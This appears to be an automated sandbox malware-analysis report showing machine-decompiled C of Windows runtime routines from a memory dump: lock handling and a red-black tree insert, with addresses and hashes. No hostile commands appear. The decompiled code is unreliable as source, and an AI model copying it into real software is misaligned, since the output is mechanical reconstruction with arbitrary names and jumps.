														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x3825c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0387F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0387F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E038C7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L03862400(_t267 + 0x20);
															}
															L03862400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E03872397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E03862280(_t134, 0x3938608);
									__eflags =  *0x3936e48 - _t253; // 0x3158650
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0385FFB0(_t198, _t241, 0x3938608);
										__eflags = _t253;
										if(_t253 != 0) {
											L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x3936e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x3938608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E03876B90(_t210,  &_v64);
										_t262 =  *0x3938608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0387E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E038897C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0388006A(0x3938608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x3938608);
												E0388B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x3936904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x3936e48; // 0x3158650
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0385FFB0(_t198, _t240, 0x3938608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E038800C2(0x3938608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x038720a0
0x038720a8
0x038720ad
0x038720b3
0x038720b8
0x038720c2
0x038720c7
0x038720cb
0x038720d2
0x03872263
0x03872266
0x038b5836
0x038b5836
0x00000000
0x0387226c
0x0387226c
0x03872270
0x03872274
0x038720e2
0x038720e2
0x038720e6
0x038720ee
0x038b57dc
0x038b57de
0x038b57ec
0x038b57ec
0x038b57f1
0x038b57f3
0x038b57f8
0x00000000
0x038b57f8
0x038b57e0
0x038b57e4
0x038b57ea
0x00000000
0x00000000
0x00000000
0x038b57ea
0x038720f4
0x038720f4
0x038720f8
0x038720f8
0x038720fc
0x03872100
0x03872106
0x03872201
0x03872206
0x0387220b
0x0387220e
0x038722a9
0x038722ac
0x00000000
0x00000000
0x038722b2
0x038722b5
0x038b5801
0x038b5806
0x00000000
0x00000000
0x038b5810
0x038b5815
0x038b5818
0x00000000
0x00000000
0x038b581e
0x038722bb
0x038722bb
0x03872218
0x03872218
0x0387221c
0x03872220
0x03872222
0x038722c2
0x038722c4
0x038722dc
0x038722dc
0x038722e1
0x00000000
0x00000000
0x00000000
0x038722e7
0x038722c8
0x038722cd
0x038722d3
0x038722d6
0x038b5823
0x038b5825
0x038b5827
0x00000000
0x00000000
0x038b582d
0x00000000
0x038b582d
0x00000000
0x03872228
0x03872228
0x00000000
0x03872228
0x03872222
0x03872214
0x03872214
0x00000000
0x03872114
0x03872114
0x03872114
0x0387211a
0x0387211c
0x03872348
0x0387234d
0x038b5840
0x038b5845
0x038b5848
0x038b584e
0x038b584e
0x038b5848
0x03872353
0x03872355
0x03872388
0x03872388
0x03872368
0x0387236a
0x0387236c
0x0387238f
0x00000000
0x0387236e
0x0387236e
0x0387218e
0x0387218e
0x03872191
0x03872195
0x038b5a03
0x038b5a06
0x038b5a0c
0x038b5a0f
0x038b5a11
0x038b5a13
0x038b5a13
0x038b5a19
0x038b5a1f
0x00000000
0x0387219b
0x0387219b
0x038721a0
0x03872282
0x03872284
0x03872284
0x03872284
0x03872284
0x038721a6
0x038721a9
0x038721ac
0x038721ae
0x038721b3
0x0387228b
0x03872290
0x03872379
0x03872296
0x03872298
0x03872298
0x03872290
0x038721b9
0x038721be
0x038722a2
0x038722a2
0x038721c4
0x038721c8
0x038721cc
0x038721d0
0x038721d4
0x038721de
0x038721e3
0x038b5a29
0x038b5a2c
0x00000000
0x00000000
0x038b5a3b
0x00000000
0x038721e9
0x038721e9
0x038721e9
0x038721ee
0x038721f1
0x038b5a45
0x038b5a4b
0x038b5a52
0x038b5a58
0x038b5a5d
0x038b5a5f
0x038b5a71
0x038b5a61
0x038b5a6a
0x038b5a6a
0x038b5a76
0x038b5a79
0x038b5a7f
0x038b5a83
0x038b5a85
0x038b5a87
0x038b5a87
0x038b5a8c
0x038b5a91
0x038b5a97
0x038b5a9f
0x038b5aa0
0x038b5aa1
0x038b5aa6
0x038b5aab
0x038b5ab1
0x038b5ab3
0x038b5ab9
0x038b5aca
0x038b5ad4
0x038b5ad4
0x038b5ade
0x038b5ade
0x038b5aab
0x038b5a79
0x038b5a52
0x038721f7
0x038721f9
0x038721fe
0x038721fe
0x038721e3
0x03872195
0x0387236c
0x03872122
0x03872122
0x03872124
0x03872231
0x03872236
0x03872236
0x03872238
0x03872238
0x03872240
0x03872242
0x03872244
0x038b59fc
0x0387218c
0x0387218c
0x00000000
0x0387218c
0x0387224a
0x0387224f
0x03872256
0x03872304
0x03872309
0x0387230f
0x0387231e
0x0387231e
0x0387231e
0x03872320
0x03872325
0x0387232a
0x0387232c
0x0387233e
0x0387233e
0x00000000
0x0387232c
0x03872311
0x03872317
0x0387231a
0x0387231c
0x03872380
0x03872380
0x03872380
0x03872384
0x00000000
0x00000000
0x03872386
0x00000000
0x0387231c
0x0387225c
0x0387225c
0x00000000
0x0387225c
0x0387212a
0x03872134
0x03872138
0x0387213d
0x038b5858
0x038b5863
0x038b5863
0x038b5867
0x038b586a
0x00000000
0x00000000
0x038b586c
0x038b586c
0x038b5871
0x038b5875
0x038b5877
0x038b5997
0x038b599c
0x038b59a1
0x038b59a7
0x038b59a7
0x00000000
0x038b59a7
0x038b587d
0x00000000
0x038b588b
0x038b588b
0x038b5890
0x038b5892
0x038b5894
0x038b5899
0x038b589b
0x038b58a0
0x038b58a0
0x038b58aa
0x038b58b2
0x038b58b6
0x038b58be
0x038b58c6
0x038b58c9
0x038b590d
0x038b5917
0x038b591a
0x038b591c
0x038b5920
0x038b5928
0x038b592a
0x038b592c
0x038b592e
0x038b592e
0x038b58cb
0x038b58cd
0x038b58d8
0x038b58e0
0x038b58f4
0x038b58fe
0x038b58fe
0x038b593a
0x038b593e
0x038b5940
0x038b5942
0x00000000
0x038b5944
0x038b5944
0x038b5949
0x038b594e
0x038b594e
0x038b5953
0x038b595b
0x038b5976
0x038b5976
0x038b597a
0x038b597f
0x00000000
0x00000000
0x00000000
0x00000000
0x038b5981
0x038b5981
0x038b5981
0x038b5983
0x038b5988
0x038b598d
0x038b5991
0x038b5991
0x00000000
0x038b595d
0x038b595d
0x038b5963
0x038b5965
0x00000000
0x00000000
0x00000000
0x00000000
0x038b5967
0x038b5967
0x038b596b
0x038b596d
0x00000000
0x00000000
0x038b596f
0x038b5971
0x038b5971
0x038b5974
0x00000000
0x00000000
0x00000000
0x038b5974
0x00000000
0x038b5967
0x038b595b
0x038b5942
0x038b5863
0x03872143
0x03872143
0x03872149
0x0387214f
0x038722f1
0x038722f6
0x00000000
0x03872173
0x03872173
0x0387217d
0x03872181
0x03872186
0x038b59ae
0x038b59b2
0x038b59b5
0x038b59b7
0x038b59ba
0x038b59cd
0x038b59d1
0x038b59d5
0x038b59d9
0x038b59db
0x00000000
0x00000000
0x038b59dd
0x038b59dd
0x038b59e1
0x038b59e4
0x038b59e7
0x038b59ee
0x038b59ee
0x038b59f3
0x038b59f3
0x00000000
0x03872186
0x0387214f
0x03872106
0x03872266
0x038720d8
0x038720da
0x038720e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bf27a03f20ba18820e465453862b18650508620f756de64cf43cb34536410b5
Instruction ID: ca295a5a304d865029a46a990cb49a5cd4a4ac52d92990f070d218b04cbb962b
Opcode Fuzzy Hash: 6bf27a03f20ba18820e465453862b18650508620f756de64cf43cb34536410b5
Instruction Fuzzy Hash: ADF12371A083469FD725DFA8C44076AB7E6BF86328F0889DDE895DB390D734D841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0385B090, Relevance: .4, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0385B090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}

0x0385b095
0x0385b09b
0x0385b09f
0x0385b0a5
0x0385b0a7
0x0385b0aa
0x0385b0ad
0x0385b0b1
0x0385b3f8
0x0385b3fa
0x0385b3ff
0x0385b419
0x0385b41b
0x0385b41b
0x0385b401
0x00000000
0x0385b0b7
0x0385b0b9
0x0385b0bc
0x0385b0c0
0x0385b0c2
0x0385b0c2
0x0385b0c4
0x0385b0c8
0x0385b0cf
0x0385b0d1
0x0385b0d1
0x0385b0da
0x0385b0dd
0x0385b0df
0x0385b0df
0x0385b0e4
0x0385b0e9
0x0385b3e2
0x0385b3e5
0x0385b3eb
0x038aa676
0x038aa67b
0x038aa67d
0x0385b3f1
0x0385b3f1
0x0385b3f1
0x0385b0ef
0x0385b0ef
0x0385b0ef
0x0385b0e9
0x0385b0f6
0x0385b28d
0x0385b28e
0x0385b293
0x0385b0fc
0x0385b0fc
0x0385b101
0x0385b104
0x0385b107
0x0385b10c
0x038aa687
0x038aa68d
0x038aa68d
0x038aa687
0x0385b112
0x0385b116
0x038aa696
0x038aa69c
0x038aa69c
0x038aa696
0x0385b120
0x0385b121
0x0385b124
0x0385b127
0x0385b12a
0x0385b12d
0x0385b132
0x038aa6a5
0x00000000
0x00000000
0x038aa6ab
0x00000000
0x0385b138
0x0385b138
0x0385b13a
0x0385b193
0x0385b197
0x0385b19d
0x0385b29c
0x0385b29f
0x0385b2a2
0x0385b2a7
0x038aa6d2
0x038aa6d8
0x038aa6d8
0x038aa6d2
0x0385b2af
0x0385b420
0x0385b422
0x0385b423
0x00000000
0x0385b2b5
0x0385b2b5
0x0385b2ba
0x038aa6e1
0x038aa6e7
0x038aa6e7
0x038aa6e1
0x0385b2c2
0x00000000
0x0385b2c8
0x0385b2cb
0x0385b2d0
0x038aa6f0
0x038aa6f6
0x038aa6f6
0x038aa6f0
0x0385b2d8
0x00000000
0x0385b2de
0x0385b2de
0x0385b2de
0x0385b2e1
0x0385b2e6
0x0385b2eb
0x038aa6ff
0x038aa705
0x038aa705
0x038aa6ff
0x0385b2f3
0x00000000
0x0385b2f9
0x0385b2fb
0x0385b2fd
0x0385b301
0x0385b303
0x0385b303
0x0385b308
0x0385b30b
0x0385b310
0x0385b312
0x0385b312
0x0385b31c
0x0385b322
0x0385b327
0x038aa70e
0x0385b335
0x0385b337
0x038aa71d
0x038aa723
0x038aa723
0x038aa71d
0x0385b340
0x0385b345
0x0385b349
0x038aa72a
0x038aa72a
0x0385b352
0x0385b357
0x0385b359
0x0385b359
0x0385b365
0x0385b367
0x0385b36c
0x00000000
0x0385b36c
0x038aa714
0x038aa714
0x0385b32f
0x0385b3b8
0x0385b3bd
0x0385b3c4
0x0385b425
0x0385b427
0x0385b429
0x0385b429
0x0385b427
0x0385b3c8
0x00000000
0x00000000
0x0385b3ce
0x0385b42f
0x0385b3d0
0x0385b3d0
0x0385b3d0
0x0385b3d7
0x0385b3da
0x0385b3da
0x00000000
0x0385b32f
0x0385b2f3
0x0385b2d8
0x0385b2c2
0x0385b2af
0x0385b1a3
0x0385b1a9
0x0385b1af
0x0385b1b2
0x0385b1b5
0x0385b1b8
0x038aa733
0x038aa739
0x038aa739
0x038aa733
0x0385b1c0
0x00000000
0x0385b1c6
0x0385b1c8
0x0385b1cb
0x0385b1ce
0x0385b1d3
0x038aa742
0x038aa748
0x038aa748
0x038aa742
0x0385b1db
0x00000000
0x0385b1e1
0x0385b1e1
0x0385b1e6
0x0385b1e9
0x0385b1ee
0x038aa751
0x0385b409
0x0385b409
0x0385b40e
0x00000000
0x00000000
0x0385b410
0x0385b22d
0x0385b22f
0x038aa790
0x038aa796
0x038aa796
0x038aa790
0x0385b23d
0x0385b243
0x0385b248
0x038aa79f
0x00000000
0x00000000
0x038aa7a5
0x00000000
0x0385b24e
0x0385b24e
0x0385b250
0x0385b374
0x0385b379
0x0385b37e
0x038aa7ae
0x038aa7b4
0x038aa7b4
0x038aa7ae
0x0385b386
0x00000000
0x0385b38c
0x0385b38e
0x038aa7bd
0x0385b394
0x0385b394
0x0385b394
0x0385b39b
0x0385b39e
0x00000000
0x0385b39e
0x0385b386
0x0385b256
0x0385b258
0x038aa7c6
0x038aa7cc
0x038aa7cc
0x038aa7c6
0x0385b261
0x0385b266
0x0385b26a
0x038aa7d3
0x038aa7d3
0x0385b273
0x0385b278
0x0385b27a
0x0385b27a
0x0385b281
0x0385b283
0x0385b285
0x0385b287
0x0385b289
0x00000000
0x0385b289
0x0385b248
0x038aa757
0x038aa757
0x0385b1f6
0x00000000
0x00000000
0x0385b1fc
0x0385b201
0x038aa760
0x038aa766
0x038aa766
0x038aa760
0x0385b209
0x0385b3a8
0x038aa76f
0x0385b3ae
0x0385b3ae
0x0385b3ae
0x0385b3b0
0x00000000
0x0385b20f
0x0385b20f
0x0385b213
0x038aa778
0x038aa77e
0x038aa77e
0x038aa778
0x0385b21b
0x00000000
0x0385b221
0x0385b223
0x038aa787
0x0385b229
0x0385b229
0x0385b229
0x0385b22b
0x00000000
0x0385b22b
0x0385b21b
0x0385b209
0x0385b1db
0x0385b142
0x0385b142
0x0385b146
0x0385b148
0x0385b14c
0x0385b14f
0x0385b154
0x0385b15b
0x038aa6b4
0x00000000
0x00000000
0x038aa6ba
0x038aa6ba
0x0385b163
0x00000000
0x00000000
0x00000000
0x0385b163
0x0385b13a
0x0385b169
0x0385b16b
0x0385b16e
0x0385b171
0x0385b175
0x0385b178
0x038aa6c3
0x038aa6c9
0x038aa6c9
0x038aa6c3
0x0385b180
0x0385b184
0x00000000
0x0385b104
0x0385b0f6

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction ID: ad47861e2fb7f4fc9861df45a80eee459d74d0bcd5c1ac425ec2dda3a84b8ffd
Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction Fuzzy Hash: 33D1C13170461A8BDF27CEE9C48027AF7E5AFA5259B2C81E8FC65CB241E771D841C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 03840D20, Relevance: .4, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E03840D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
